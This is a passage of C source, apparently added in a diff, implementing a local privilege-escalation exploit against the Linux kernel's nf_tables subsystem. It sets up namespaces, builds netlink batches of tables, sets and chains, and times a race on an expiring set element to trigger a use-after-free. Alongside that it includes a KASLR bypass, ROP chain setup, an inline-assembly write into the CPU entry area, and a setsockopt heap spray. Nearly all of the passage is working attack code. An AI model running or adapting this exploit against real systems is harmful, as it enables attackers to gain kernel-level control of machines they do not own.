va_start(ap, code); + + struct nlattr* data = netlink_attr_nest_begin(attr, type); + + struct nlattr* verdict = netlink_attr_nest_begin(data, NFTA_DATA_VERDICT); + netlink_attr_append(verdict, NFTA_VERDICT_CODE, &code, sizeof(code)); + + while (1) { + u16 t = va_arg(ap, u32); + if (!t) { + break; + } + + void* data = va_arg(ap, void*); + size_t size = va_arg(ap, size_t); + + netlink_attr_append(verdict, t, data, size); + } + + netlink_attr_nest_end(data, verdict); + netlink_attr_nest_end(attr, data); + +} + +int ip_link_set_flags(int s, int ifindex, unsigned int ifi_flags) { + u8 buf[1024] = {0}; + struct nlmsghdr* nlh = (void*)buf; + + struct ifinfomsg* data = NLMSG_DATA(nlh); + nlh->nlmsg_len = sizeof(*data) + NLMSG_HDRLEN; + nlh->nlmsg_type = RTM_NEWLINK; + nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK; + nlh->nlmsg_seq = 0; + nlh->nlmsg_pid = 0; + + data->ifi_family = PF_UNSPEC; + data->ifi_type = 0; + data->ifi_index = ifindex; + data->ifi_flags = ifi_flags;// IFF_UP; + data->ifi_change = 1; + + FAIL_IF(netlink_send(s, nlh) < 0); + FAIL_IF(netlink_recv(s, nlh, sizeof(buf)) < 0); + FAIL_IF(netlink_errno(nlh) != 0); + return 0; +} + +static void sig_handler(int s) {} + +static __attribute__((noreturn)) void write_cpu_entry_area(void* payload) { + asm volatile ( + "mov %0, %%rsp\n" + "pop %%r15\n" + "pop %%r14\n" + "pop %%r13\n" + "pop %%r12\n" + "pop %%rbp\n" + "pop %%rbx\n" + "pop %%r11\n" + "pop %%r10\n" + "pop %%r9\n" + "pop %%r8\n" + "pop %%rax\n" + "pop %%rcx\n" + "pop %%rdx\n" + "pop %%rsi\n" + "pop %%rdi\n" + "divq (0x1234000)\n" + "1:\n" + "jmp 1b\n" + : : "r"(payload) + ); + __builtin_unreachable(); +} + +// Fill the CPU entry area exception stack of HELPER_CPU with a +// struct cpu_entry_area_payload +static void setup_cpu_entry_area() { + if (fork()) { + return; + } + + struct cpu_entry_area_payload payload = {}; + payload.nft_expr_eval = push_rdi_jmp_rsi_0xf; + payload.pop_rsp_jmp_rsi_0xf = pop_rsp_jmp_rsi_0xf; + payload.nft_do_chain_leave = nft_do_chain_leave; + + PANIC_IF(_pin_to_cpu(HELPER_CPU) < 0); + PANIC_IF(signal(SIGFPE, sig_handler) == SIG_ERR); + PANIC_IF(signal(SIGTRAP, sig_handler) == SIG_ERR); + PANIC_IF(signal(SIGSEGV, sig_handler) == SIG_ERR); + PANIC_IF(setsid() == -1); + + write_cpu_entry_area(&payload); +} + + +static void* payload_page = NULL; + +int spray_payload(int fd) { + struct ipt_replace replace = {}; + // into dyn-kmalloc-8k-cg please + replace.size = 0x1000 + 1; + // need this to make the allocation + replace.num_counters = 1; + + memcpy(payload_page, &replace, sizeof(replace)); + _Static_assert(sizeof(replace) + sizeof(payload) <= 0x1000, "payload does not fit into one page"); + memcpy(payload_page + sizeof(replace), &payload, sizeof(payload)); + + // int fd = socket(AF_INET, SOCK_STREAM, 0); + + for (int i = 0; i < 8; i++) { + // this faults during the copy_from_user_call, immediately frees our payload again, + // but that is enough for us + if (setsockopt(fd, SOL_IP, IPT_SO_SET_REPLACE, payload_page, 0x1000 * 2) == 0 || errno != EFAULT) { + printf("spray payload: setsockopt(): unexpected error?\n"); + return -1; + } + } + + return 0; +} + +#define BUF_SIZE (1024*8) +static int send_check(int fd, struct nlmsghdr* batch) { + u32 total_len = batch->nlmsg_len; + if (total_len > BUF_SIZE) { + printf("message too large: %u\n", total_len); + abort(); + } + + batch->nlmsg_len = NLMSG_HDRLEN + sizeof(struct nfgenmsg); + + FAIL_IF(__netlink_send(fd, batch, total_len) < 0); + FAIL_IF(netlink_recv(fd, batch, BUF_SIZE) < 0); + + return netlink_errno(batch); +} + +u64 get_jiffies() { + return times(NULL) * 10; +} + + +void sandbox() { + PANIC_IF(_pin_to_cpu(MAIN_CPU) < 0); + PANIC_IF(unshare(CLONE_NEWUSER | CLONE_NEWNET)); + + int s; + PANIC_IF((s = netlink_open(NETLINK_ROUTE)) < 0); + PANIC_IF(ip_link_set_flags(s, 1 /* if_nametoindex("lo") */, IFF_UP)); + close(s); +} + +int main(int argc, char *argv[]) { + printf("Hello World!\n"); + sandbox(); + + if (argc > 1) { + u64 base = strtoull(argv[1], NULL, 16); + bypass_kaslr(base); + } else { + bypass_kaslr(0); + } + + // prepare all the payloads and the processes using them + setup_registers(&payload); + setup_rop_chain(&payload); + + // fd to spray payloads + int spray_fd; + FAIL_IF((spray_fd = socket(AF_INET, SOCK_STREAM, 0)) < 0); + // mmap an isolated page which will fault when over-read + payload_page = mmap((void*)0xAAAAA000, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0); + FAIL_IF(payload_page == MAP_FAILED); + + // fd to trigger payload + int s; + FAIL_IF((s = socket(AF_INET, SOCK_DGRAM, 0)) < 0); + struct sockaddr_in dst = {}; + dst.sin_port = 9999; + inet_aton("127.0.0.1", &dst.sin_addr); + + // now a large portion of nf_tables setup code, will do the following: + // table MY_TABLE + // set MY_SET + // + // chain JUNK + // return + // + // [ MAX_NUM_JUNK_OPS times ] + // set junk SJ_x + // [ NUM_ELEMS_JUNK_SET times ] + // verdict JUMP chain JUNK + // + // chain A (basechain) + // JUMP chain B (1 use) + // chain B + // RETURN + // [ many chunk rules, to prepare for > 0x1000 allocation ] + // + // eventually we will add one additional verdict to MY_SET: + // set MY_SET + // verdict JUMP chain B (1 use) + // + // mostly noise, read comments for key information + int nfd; + FAIL_IF((nfd = netlink_open(NETLINK_NETFILTER)) < 0); + + u8* buf; + FAIL_IF((buf = calloc(BUF_SIZE, 1)) == NULL); + + printf("1) setup table, victim set and a bunch of junk sets\n"); + struct nlmsghdr* batch = (void*)buf; + + struct nfgenmsg* data = NLMSG_DATA(batch); + batch->nlmsg_len = NLMSG_HDRLEN + sizeof(*data); + batch->nlmsg_type = NFNL_MSG_BATCH_BEGIN; + batch->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK; + batch->nlmsg_seq = 0; + batch->nlmsg_pid = 0; + + data->nfgen_family = NFPROTO_IPV4; + data->res_id = htons(NFNL_SUBSYS_NFTABLES); + + { + // Create a new table + struct nlmsghdr* nlh = begin_batch_chunk(batch); + + struct nfgenmsg* data = NLMSG_DATA(nlh); + nlh->nlmsg_len = NLMSG_HDRLEN + sizeof(*data); + nlh->nlmsg_type = (NFNL_SUBSYS_NFTABLES << 8) | NFT_MSG_NEWTABLE; + nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE; + nlh->nlmsg_seq = 0; + nlh->nlmsg_pid = 0; + + data->nfgen_family = NFPROTO_IPV4; + + netlink_attr_put(nlh, NFTA_TABLE_NAME, MY_TABLE); + + end_batch_chunk(batch, nlh); + } + { + // Create a new set + struct nlmsghdr* nlh = begin_batch_chunk(batch); + struct nfgenmsg* data = NLMSG_DATA(nlh); + nlh->nlmsg_len = NLMSG_HDRLEN + sizeof(*data); + nlh->nlmsg_type = (NFNL_SUBSYS_NFTABLES << 8) | NFT_MSG_NEWSET; + nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE; + nlh->nlmsg_seq = 0; + nlh->nlmsg_pid = 0; + + data->nfgen_family = NFPROTO_IPV4; + + const u32 keylen = htonl(MY_KEY_LEN); + netlink_attr_put(nlh, NFTA_SET_KEY_LEN, &keylen, sizeof(keylen)); + + // need NFT_SET_MAP in order to place verdict + // need NFT_SET_TIMEOUT in order to allow elements to expire + const u32 flags = htonl(NFT_SET_MAP | NFT_SET_TIMEOUT); + netlink_attr_put(nlh, NFTA_SET_FLAGS, &flags, sizeof(flags)); + + // we want to place verdict data, please + const u32 type = htonl(NFT_DATA_VERDICT); + netlink_attr_put(nlh, NFTA_SET_DATA_TYPE, &type, sizeof(type)); + + netlink_attr_put(nlh, NFTA_SET_TABLE, MY_TABLE); + netlink_attr_put(nlh, NFTA_SET_NAME, MY_SET); + + const u32 id = htonl(0xAABBCCDD); + netlink_attr_put(nlh, NFTA_SET_ID, &id, sizeof(id)); + + end_batch_chunk(batch, nlh); + } + + // create a bunch of junk sets + for (int i = 0; i < MAX_NUM_JUNK_OPS; i++) { + struct nlmsghdr* nlh = begin_batch_chunk(batch); + struct nfgenmsg* data = NLMSG_DATA(nlh); + nlh->nlmsg_len = NLMSG_HDRLEN + sizeof(*data); + nlh->nlmsg_type = (NFNL_SUBSYS_NFTABLES << 8) | NFT_MSG_NEWSET; + nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE; + nlh->nlmsg_seq = 0; + nlh->nlmsg_pid = 0; + + data->nfgen_family = NFPROTO_IPV4; + + const u32 keylen = htonl(MY_KEY_LEN); + netlink_attr_put(nlh, NFTA_SET_KEY_LEN, &keylen, sizeof(keylen)); + + // need NFT_SET_MAP in order to place verdict + const u32 flags = htonl(NFT_SET_MAP | NFT_SET_CONCAT); + netlink_attr_put(nlh, NFTA_SET_FLAGS, &flags, sizeof(flags)); + + // we want to place verdict data, please + const u32 type = htonl(NFT_DATA_VERDICT); + netlink_attr_put(nlh, NFTA_SET_DATA_TYPE, &type, sizeof(type)); + + netlink_attr_put(nlh, NFTA_SET_TABLE, MY_TABLE); + + const u16 name = generate_set_name(i); + netlink_attr_put(nlh, NFTA_SET_NAME, &name, sizeof(name)); + + const u32 id = htonl(0xFF000000 | i); + netlink_attr_put(nlh, NFTA_SET_ID, &id, sizeof(id)); + + const u32 policy = htonl(NFT_SET_POL_MEMORY); + netlink_attr_put(nlh, NFTA_SET_POLICY, &policy, sizeof(policy)); + + struct nlattr* n = netlink_nest_begin(nlh, NFTA_SET_DESC); + + // Need to set NFTA_SET_DESC_SIZE in order to select some other than rhash map type + // This is not needed, but this makes the execution paths clearer should one decide to debug + // things + const u32 size = htonl(NUM_ELEMS_JUNK_SET); + netlink_attr_append(n, NFTA_SET_DESC_SIZE, &size, sizeof(size)); + + struct nlattr* nn = netlink_attr_nest_begin(n, NFTA_SET_DESC_CONCAT); + + // create one field + const u32 len = htonl(MY_KEY_LEN); + + struct nlattr* el = netlink_attr_nest_begin(nn, NFTA_LIST_ELEM); + netlink_attr_append(el, NFTA_SET_FIELD_LEN, &len, sizeof(len)); + netlink_attr_nest_end(nn, el); + + el = netlink_attr_nest_begin(nn, NFTA_LIST_ELEM); + netlink_attr_append(el, NFTA_SET_FIELD_LEN, &len, sizeof(len)); + netlink_attr_nest_end(nn, el); + + netlink_attr_nest_end(n, nn); + netlink_nest_end(nlh, n); + + end_batch_chunk(batch, nlh); + } + + { + // Create a new junk chain, chain J. We use it as a target for our verdicts. + // just to make sure that transactions will do a lot of actual work. + struct nlmsghdr* nlh = begin_batch_chunk(batch); + struct nfgenmsg* data = NLMSG_DATA(nlh); + nlh->nlmsg_len = NLMSG_HDRLEN + sizeof(*data); + nlh->nlmsg_type = (NFNL_SUBSYS_NFTABLES << 8) | NFT_MSG_NEWCHAIN; + nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE; + nlh->nlmsg_seq = 0; + nlh->nlmsg_pid = 0; + + data->nfgen_family = NFPROTO_IPV4; + + netlink_attr_put(nlh, NFTA_CHAIN_TABLE, MY_TABLE); + netlink_attr_put(nlh, NFTA_CHAIN_NAME, CHAIN_JUNK); + + const u32 flags = htonl(0); + netlink_attr_put(nlh, NFTA_CHAIN_FLAGS, &flags, sizeof(flags)); + + end_batch_chunk(batch, nlh); + } + + { + // Add a new rule RETURN to chain J: + struct nlmsghdr* nlh = begin_batch_chunk(batch); + struct nfgenmsg* data = NLMSG_DATA(nlh); + nlh->nlmsg_len = NLMSG_HDRLEN + sizeof(*data); + nlh->nlmsg_type = (NFNL_SUBSYS_NFTABLES << 8) | NFT_MSG_NEWRULE; + nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE; + nlh->nlmsg_seq = 0; + nlh->nlmsg_pid = 0; + + data->nfgen_family = NFPROTO_IPV4; + + netlink_attr_put(nlh, NFTA_RULE_TABLE, MY_TABLE); + netlink_attr_put(nlh, NFTA_RULE_CHAIN, CHAIN_JUNK); + + struct nlattr* exprs = netlink_nest_begin(nlh, NFTA_RULE_EXPRESSIONS); + + struct nlattr* el = netlink_attr_nest_begin(exprs, NFTA_LIST_ELEM); + + netlink_attr_append(el, NFTA_EXPR_NAME, "immediate", strlen("immediate")); + struct nlattr* expr_data = netlink_attr_nest_begin(el, NFTA_EXPR_DATA); + + add_verdict_data(expr_data, NFTA_IMMEDIATE_DATA, htonl(NFT_RETURN), 0); + + const u32 dreg = htonl(NFT_REG_VERDICT); + netlink_attr_append(expr_data, NFTA_IMMEDIATE_DREG, &dreg, sizeof(dreg)); + + netlink_attr_nest_end(el, expr_data); + netlink_attr_nest_end(exprs, el); + + netlink_nest_end(nlh, exprs); + + end_batch_chunk(batch, nlh); + } + + { + struct nlmsghdr* nlh = begin_batch_chunk(batch); + + struct nfgenmsg* data = NLMSG_DATA(nlh); + nlh->nlmsg_len = NLMSG_HDRLEN + sizeof(*data); + nlh->nlmsg_type = NFNL_MSG_BATCH_END; + nlh->nlmsg_flags = NLM_F_REQUEST; + nlh->nlmsg_seq = 0; + nlh->nlmsg_pid = 0; + + end_batch_chunk(batch, nlh); + } + + if (send_check(nfd, batch) != 0) { + perror("netlink_send()"); + return -1; + } + + printf("2) fill junk sets\n"); + + for (int i = 0; i < MAX_NUM_JUNK_OPS; i++) { + const u16 set_name = generate_set_name(i); + + // fill each set with NUM_ELEMS_JUNK_SET elements + for (int j = 0; j < NUM_ELEMS_JUNK_SET / NUM_ELEMS_PER_BATCH; j++) { + bzero(buf, BUF_SIZE); + + batch->nlmsg_len = NLMSG_HDRLEN + sizeof(*data); + batch->nlmsg_type = NFNL_MSG_BATCH_BEGIN; + batch->nlmsg_flags = NLM_F_REQUEST ; + batch->nlmsg_seq = 0; + batch->nlmsg_pid = 0; + + data->nfgen_family = NFPROTO_IPV4; + data->res_id = htons(NFNL_SUBSYS_NFTABLES); + + for (int k = 0; k < NUM_ELEMS_PER_BATCH; k++) { + // Insert verdict JUMP chain J into the set + struct nlmsghdr* nlh = begin_batch_chunk(batch); + struct nfgenmsg* data = NLMSG_DATA(nlh); + nlh->nlmsg_len = NLMSG_HDRLEN + sizeof(*data); + nlh->nlmsg_type = (NFNL_SUBSYS_NFTABLES << 8) | NFT_MSG_NEWSETELEM; + nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE; + nlh->nlmsg_seq = 0; + nlh->nlmsg_pid = 0; + + data->nfgen_family = NFPROTO_IPV4; + + netlink_attr_put(nlh, NFTA_SET_ELEM_LIST_TABLE, MY_TABLE); + netlink_attr_put(nlh, NFTA_SET_ELEM_LIST_SET, &set_name, sizeof(set_name)); + + struct nlattr* list = netlink_nest_begin(nlh, NFTA_SET_ELEM_LIST_ELEMENTS); + + // not sure why we need this nesting .. + struct nlattr* el = netlink_attr_nest_begin(list, 0xFFFF); + + const u32 flags = htonl(0); + netlink_attr_append(el, NFTA_SET_ELEM_FLAGS, &flags, sizeof(flags)); + + add_verdict_data(el, NFTA_SET_ELEM_DATA, htonl(NFT_JUMP), NFTA_VERDICT_CHAIN, CHAIN_JUNK, 0); + + struct nlattr* key = netlink_attr_nest_begin(el, NFTA_SET_ELEM_KEY); + + u8 key_data[MY_KEY_LEN] = {}; + _Static_assert(MY_KEY_LEN >= 3, ""); + key_data[0] = 0x41; + key_data[1] = j+1; + key_data[2] = k+1; + + netlink_attr_append(key, NFTA_DATA_VALUE, key_data, sizeof(key_data)); + + netlink_attr_nest_end(el, key); + netlink_attr_nest_end(list, el); + netlink_nest_end(nlh, list); + + end_batch_chunk(batch, nlh); + } + + { + struct nlmsghdr* nlh = begin_batch_chunk(batch); + + struct nfgenmsg* data = NLMSG_DATA(nlh); + nlh->nlmsg_len = NLMSG_HDRLEN + sizeof(*data); + nlh->nlmsg_type = NFNL_MSG_BATCH_END; + nlh->nlmsg_flags = NLM_F_REQUEST; + nlh->nlmsg_seq = 0; + nlh->nlmsg_pid = 0; + + end_batch_chunk(batch, nlh); + } + + if (send_check(nfd, batch) != 0) { + perror("netlink_send()"); + return -1; + } + } + } + + printf("3) setup primitives\n"); + + bzero(buf, BUF_SIZE); + + batch->nlmsg_len = NLMSG_HDRLEN + sizeof(*data); + batch->nlmsg_type = NFNL_MSG_BATCH_BEGIN; + batch->nlmsg_flags = NLM_F_REQUEST ; + batch->nlmsg_seq = 0; + batch->nlmsg_pid = 0; + + data->nfgen_family = NFPROTO_IPV4; + data->res_id = htons(NFNL_SUBSYS_NFTABLES); + + { + // Create a new chain, chain A, our base chain + struct nlmsghdr* nlh = begin_batch_chunk(batch); + struct nfgenmsg* data = NLMSG_DATA(nlh); + nlh->nlmsg_len = NLMSG_HDRLEN + sizeof(*data); + nlh->nlmsg_type = (NFNL_SUBSYS_NFTABLES << 8) | NFT_MSG_NEWCHAIN; + nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE; + nlh->nlmsg_seq = 0; + nlh->nlmsg_pid = 0; + + data->nfgen_family = NFPROTO_IPV4; + + netlink_attr_put(nlh, NFTA_CHAIN_TABLE, MY_TABLE); + netlink_attr_put(nlh, NFTA_CHAIN_NAME, CHAIN_A); + + const u32 flags = htonl(NFT_CHAIN_BASE); + netlink_attr_put(nlh, NFTA_CHAIN_FLAGS, &flags, sizeof(flags)); + + struct nlattr* hook = netlink_nest_begin(nlh, NFTA_CHAIN_HOOK); + + const u32 hooknum = htonl(NF_INET_LOCAL_IN); + const u32 priority = htonl(0); + netlink_attr_append(hook, NFTA_HOOK_HOOKNUM, &hooknum, sizeof(hooknum)); + netlink_attr_append(hook, NFTA_HOOK_PRIORITY, &priority, sizeof(priority)); + + netlink_nest_end(nlh, hook); + + end_batch_chunk(batch, nlh); + } + + { + // Create a new chain, chain B + struct nlmsghdr* nlh = begin_batch_chunk(batch); + struct nfgenmsg* data = NLMSG_DATA(nlh); + nlh->nlmsg_len = NLMSG_HDRLEN + sizeof(*data); + nlh->nlmsg_type = (NFNL_SUBSYS_NFTABLES << 8) | NFT_MSG_NEWCHAIN; + nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE; + nlh->nlmsg_seq = 0; + nlh->nlmsg_pid = 0; + + data->nfgen_family = NFPROTO_IPV4; + + netlink_attr_put(nlh, NFTA_CHAIN_TABLE, MY_TABLE); + netlink_attr_put(nlh, NFTA_CHAIN_NAME, CHAIN_B); + + const u32 flags = htonl(0); + netlink_attr_put(nlh, NFTA_CHAIN_FLAGS, &flags, sizeof(flags)); + + end_batch_chunk(batch, nlh); + } + + { + // Add a new rule RETURN to chain B: + struct nlmsghdr* nlh = begin_batch_chunk(batch); + struct nfgenmsg* data = NLMSG_DATA(nlh); + nlh->nlmsg_len = NLMSG_HDRLEN + sizeof(*data); + nlh->nlmsg_type = (NFNL_SUBSYS_NFTABLES << 8) | NFT_MSG_NEWRULE; + nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE; + nlh->nlmsg_seq = 0; + nlh->nlmsg_pid = 0; + + data->nfgen_family = NFPROTO_IPV4; + + netlink_attr_put(nlh, NFTA_RULE_TABLE, MY_TABLE); + netlink_attr_put(nlh, NFTA_RULE_CHAIN, CHAIN_B); + + struct nlattr* exprs = netlink_nest_begin(nlh, NFTA_RULE_EXPRESSIONS); + + struct nlattr* el = netlink_attr_nest_begin(exprs, NFTA_LIST_ELEM); + + netlink_attr_append(el, NFTA_EXPR_NAME, "immediate", strlen("immediate")); + struct nlattr* expr_data = netlink_attr_nest_begin(el, NFTA_EXPR_DATA); + + add_verdict_data(expr_data, NFTA_IMMEDIATE_DATA, htonl(NFT_RETURN), 0); + + const u32 dreg = htonl(NFT_REG_VERDICT); + netlink_attr_append(expr_data, NFTA_IMMEDIATE_DREG, &dreg, sizeof(dreg)); + + netlink_attr_nest_end(el, expr_data); + netlink_attr_nest_end(exprs, el); + + netlink_nest_end(nlh, exprs); + + end_batch_chunk(batch, nlh); + } + + { + // Add a new rule JUMP chain B to chain A: + struct nlmsghdr* nlh = begin_batch_chunk(batch); + struct nfgenmsg* data = NLMSG_DATA(nlh); + nlh->nlmsg_len = NLMSG_HDRLEN + sizeof(*data); + nlh->nlmsg_type = (NFNL_SUBSYS_NFTABLES << 8) | NFT_MSG_NEWRULE; + nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE; + nlh->nlmsg_seq = 0; + nlh->nlmsg_pid = 0; + + data->nfgen_family = NFPROTO_IPV4; + + netlink_attr_put(nlh, NFTA_RULE_TABLE, MY_TABLE); + netlink_attr_put(nlh, NFTA_RULE_CHAIN, CHAIN_A); + + struct nlattr* exprs = netlink_nest_begin(nlh, NFTA_RULE_EXPRESSIONS); + + struct nlattr* el = netlink_attr_nest_begin(exprs, NFTA_LIST_ELEM); + + netlink_attr_append(el, NFTA_EXPR_NAME, "immediate", strlen("immediate")); + struct nlattr* expr_data = netlink_attr_nest_begin(el, NFTA_EXPR_DATA); + + add_verdict_data(expr_data, NFTA_IMMEDIATE_DATA, htonl(NFT_JUMP), NFTA_VERDICT_CHAIN, CHAIN_B, 0); + + const u32 dreg = htonl(NFT_REG_VERDICT); + netlink_attr_append(expr_data, NFTA_IMMEDIATE_DREG, &dreg, sizeof(dreg)); + + netlink_attr_nest_end(el, expr_data); + netlink_attr_nest_end(exprs, el); + + netlink_nest_end(nlh, exprs); + + end_batch_chunk(batch, nlh); + } + + // Now we need to blow up chain B, the allocation needs to be larger than 4096. + // We will simply add NFT_CONTINUE immediate expressions, for no specific reason. + // Total size of our allocation will be NUM_RULES * (8 + NUM_EXPR * SIZEOF(EXPR)). + // With immediate expressions SIZEOF(EXPR) == 32 + // Choose NUM_EXPR = 16 + // We need an allocation > 4096 bytes, thus we need at least 4096 / (8 + 512) = 8 rules + for (int i = 0; i < 8; i++) + { + // Add a new rule CONTINUE to chain B: + struct nlmsghdr* nlh = begin_batch_chunk(batch); + struct nfgenmsg* data = NLMSG_DATA(nlh); + nlh->nlmsg_len = NLMSG_HDRLEN + sizeof(*data); + nlh->nlmsg_type = (NFNL_SUBSYS_NFTABLES << 8) | NFT_MSG_NEWRULE; + nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE; + nlh->nlmsg_seq = 0; + nlh->nlmsg_pid = 0; + + data->nfgen_family = NFPROTO_IPV4; + + netlink_attr_put(nlh, NFTA_RULE_TABLE, MY_TABLE); + netlink_attr_put(nlh, NFTA_RULE_CHAIN, CHAIN_B); + + struct nlattr* exprs = netlink_nest_begin(nlh, NFTA_RULE_EXPRESSIONS); + + // Add some dummy expressions, just to increase rule size + for (int j = 0; j < 16; j++) { + struct nlattr* el = netlink_attr_nest_begin(exprs, NFTA_LIST_ELEM); + netlink_attr_append(el, NFTA_EXPR_NAME, "immediate", strlen("immediate")); + struct nlattr* expr_data = netlink_attr_nest_begin(el, NFTA_EXPR_DATA); + + add_verdict_data(expr_data, NFTA_IMMEDIATE_DATA, htonl(NFT_CONTINUE), 0); + + const u32 dreg = htonl(NFT_REG_VERDICT); + netlink_attr_append(expr_data, NFTA_IMMEDIATE_DREG, &dreg, sizeof(dreg)); + + netlink_attr_nest_end(el, expr_data); + netlink_attr_nest_end(exprs, el); + } + + netlink_nest_end(nlh, exprs); + + end_batch_chunk(batch, nlh); + } + + { + struct nlmsghdr* nlh = begin_batch_chunk(batch); + + struct nfgenmsg* data = NLMSG_DATA(nlh); + nlh->nlmsg_len = NLMSG_HDRLEN + sizeof(*data); + nlh->nlmsg_type = NFNL_MSG_BATCH_END; + nlh->nlmsg_flags = NLM_F_REQUEST; + nlh->nlmsg_seq = 0; + nlh->nlmsg_pid = 0; + + end_batch_chunk(batch, nlh); + } + + if (send_check(nfd, batch) != 0) { + perror("netlink_send()"); + return -1; + } + + printf("setup complete.\n"); + + // wait for RCU for good measure + sleep(1); + + printf("sampling jiffies ..\n"); + + #define NUM_SAMPLES 5 + u64 t_delta = 0; + + for (int num_samples = 0; num_samples < NUM_SAMPLES; num_samples++) { + u64 t_begin = get_jiffies(); + u64 t_end = 0; + + bzero(buf, BUF_SIZE); + + batch->nlmsg_len = NLMSG_HDRLEN + sizeof(*data); + batch->nlmsg_type = NFNL_MSG_BATCH_BEGIN; + batch->nlmsg_flags = NLM_F_REQUEST ; + batch->nlmsg_seq = 0; + batch->nlmsg_pid = 0; + + data->nfgen_family = NFPROTO_IPV4; + data->res_id = htons(NFNL_SUBSYS_NFTABLES); + + { + // Delete the victim set. This will decrease reference counters for all elements + + struct nlmsghdr* nlh = begin_batch_chunk(batch); + struct nfgenmsg* data = NLMSG_DATA(nlh); + nlh->nlmsg_len = NLMSG_HDRLEN + sizeof(*data); + nlh->nlmsg_type = (NFNL_SUBSYS_NFTABLES << 8) | NFT_MSG_DELSET; + nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE; + nlh->nlmsg_seq = 0; + nlh->nlmsg_pid = 0; + + data->nfgen_family = NFPROTO_IPV4; + + netlink_attr_put(nlh, NFTA_SET_TABLE, MY_TABLE); + netlink_attr_put(nlh, NFTA_SET_NAME, MY_SET); + + end_batch_chunk(batch, nlh); + } + + for (u16 i = 0; i < MAX_NUM_JUNK_OPS; i++) { + { + // Delete one of our junk sets. The sole purpose is to delay the transaction + const u16 set_name = generate_set_name(i); + + struct nlmsghdr* nlh = begin_batch_chunk(batch); + struct nfgenmsg* data = NLMSG_DATA(nlh); + nlh->nlmsg_len = NLMSG_HDRLEN + sizeof(*data); + nlh->nlmsg_type = (NFNL_SUBSYS_NFTABLES << 8) | NFT_MSG_DELSET; + nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE; + nlh->nlmsg_seq = 0; + nlh->nlmsg_pid = 0; + + data->nfgen_family = NFPROTO_IPV4; + + netlink_attr_put(nlh, NFTA_SET_TABLE, MY_TABLE); + netlink_attr_put(nlh, NFTA_SET_NAME, &set_name, sizeof(set_name)); + + end_batch_chunk(batch, nlh); + } + } + + { + // Do an invalid operation, this triggers the abort path which undos + // everything we did before. + + struct nlmsghdr* nlh = begin_batch_chunk(batch); + struct nfgenmsg* data = NLMSG_DATA(nlh); + nlh->nlmsg_len = NLMSG_HDRLEN + sizeof(*data); + nlh->nlmsg_type = (NFNL_SUBSYS_NFTABLES << 8) | NFT_MSG_DELSET; + nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE; + nlh->nlmsg_seq = 0; + nlh->nlmsg_pid = 0; + + data->nfgen_family = NFPROTO_IPV4; + + end_batch_chunk(batch, nlh); + } + + { + struct nlmsghdr* nlh = begin_batch_chunk(batch); + + struct nfgenmsg* data = NLMSG_DATA(nlh); + nlh->nlmsg_len = NLMSG_HDRLEN + sizeof(*data); + nlh->nlmsg_type = NFNL_MSG_BATCH_END; + nlh->nlmsg_flags = NLM_F_REQUEST; + nlh->nlmsg_seq = 0; + nlh->nlmsg_pid = 0; + + end_batch_chunk(batch, nlh); + } + + if (send_check(nfd, batch) == 0) { + printf("unexpected success when triggering operation abort!\n"); + return -1; + } + + t_end = get_jiffies(); + t_delta += t_end - t_begin; + } // num_samples + + // This is not really needed, but we want to make sure that we get an idea of + // the size of the "race window". Usually any value which is higher than ~50 + // is sufficient. + t_delta /= NUM_SAMPLES; + printf("jiffie window size = %llu\n", t_delta); + + // + // We now trigger the bug + // + + int success = 0; + for (int attempt = 0; attempt < 100; attempt++) { + // 1) add a fast expiring element into the set + bzero(buf, BUF_SIZE); + + batch->nlmsg_len = NLMSG_HDRLEN + sizeof(*data); + batch->nlmsg_type = NFNL_MSG_BATCH_BEGIN; + batch->nlmsg_flags = NLM_F_REQUEST ; + batch->nlmsg_seq = 0; + batch->nlmsg_pid = 0; + + data->nfgen_family = NFPROTO_IPV4; + data->res_id = htons(NFNL_SUBSYS_NFTABLES); + + { + // Insert verdict JUMP chain B into the set using MY_KEY as identifier + struct nlmsghdr* nlh = begin_batch_chunk(batch); + struct nfgenmsg* data = NLMSG_DATA(nlh); + nlh->nlmsg_len = NLMSG_HDRLEN + sizeof(*data); + nlh->nlmsg_type = (NFNL_SUBSYS_NFTABLES << 8) | NFT_MSG_NEWSETELEM; + nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE; + nlh->nlmsg_seq = 0; + nlh->nlmsg_pid = 0; + + data->nfgen_family = NFPROTO_IPV4; + + netlink_attr_put(nlh, NFTA_SET_ELEM_LIST_TABLE, MY_TABLE); + netlink_attr_put(nlh, NFTA_SET_ELEM_LIST_SET, MY_SET); + + struct nlattr* list = netlink_nest_begin(nlh, NFTA_SET_ELEM_LIST_ELEMENTS); + + // not sure why we need this nesting .. + struct nlattr* el = netlink_attr_nest_begin(list, 0xFFFF); + + const u32 flags = htonl(0); + netlink_attr_append(el, NFTA_SET_ELEM_FLAGS, &flags, sizeof(flags)); + + // make our element expire really quickly .. + const u64 expiration = htobe64(t_delta > 200 ? 100 : t_delta / 2); + netlink_attr_append(el, NFTA_SET_ELEM_EXPIRATION, &expiration, sizeof(expiration)); + + // we need this so that the extension gets set, choose arbitrary large timeout + const u64 timeout = htobe64(100000); + netlink_attr_append(el, NFTA_SET_ELEM_TIMEOUT, &timeout, sizeof(timeout)); + + add_verdict_data(el, NFTA_SET_ELEM_DATA, htonl(NFT_JUMP), NFTA_VERDICT_CHAIN, CHAIN_B, 0); + + struct nlattr* key = netlink_attr_nest_begin(el, NFTA_SET_ELEM_KEY); + netlink_attr_append(key, NFTA_DATA_VALUE, MY_KEY); + netlink_attr_nest_end(el, key); + netlink_attr_nest_end(list, el); + 